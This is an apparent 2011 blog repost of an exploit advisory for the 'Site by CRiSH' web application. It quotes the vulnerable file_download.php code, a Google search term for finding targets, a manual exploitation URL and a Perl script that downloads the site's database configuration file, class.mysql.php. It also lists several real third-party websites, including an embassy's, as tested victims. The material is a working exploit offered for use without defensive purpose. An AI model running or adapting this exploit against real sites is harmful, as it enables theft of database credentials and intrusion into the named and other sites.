10 Mayıs 2011 Salı

Site by CRiSH <= Remote 'class.mysql.php' Disclosure Exploit

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME / HTTP://GRIADAMLAR.COM
--------------------------------------------------------
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Site by CRiSH
|~Price : N/A
|~Version : N/A
|~Software: http://www.iware.com.tw/
|~Vulnerability Style : Ynformation disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Site by CRiSH"
|[~]Date : "10.05.2011"
|[~]Tested on :
http://trendxmarketing.com/
www.kuwaitembassy.net
http://dxnmagnumlanka.com/
http://sambuddhatvajayanthi.com//
----------------------------------------------------------
file_download.php <= 'file' Functions Not Security
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Vulnerable ON file_download.php Lines..
<?
..
@$download_file = $_REQUEST['file'];
$download = @fopen("".$_REQUEST['file'],"r");
if(!$download) die('error in openinig file');
$file = basename($_REQUEST['file']);
..
?>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
---------------------------------------------------------
Manual Exploitation|
http://Target/file_download.php?file={ Disclosure File }
Ex:
http://trendxmarketing.com/file_down...lass.mysql.php
Exploit Scsfly!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Automatic Information Disclosure Exploit.
=============== KO.PL =================================================
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Site by CRiSH <= Remote class.mysql.php Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n*********************************************** *************************\n";
print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit *\n";
print "\* Exploited By : KnocKout *\n";
print "\* Contact : knockoutr[at]msn[dot]com *\n";
print "\* -- *\n";
print "\************************************************ *********************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="file_download.php?file=lib/class.mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "index.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] Index.php Dosyasi Indirildi (class.mysql.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
\n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}

Hiç yorum yok:

Yorum Gönder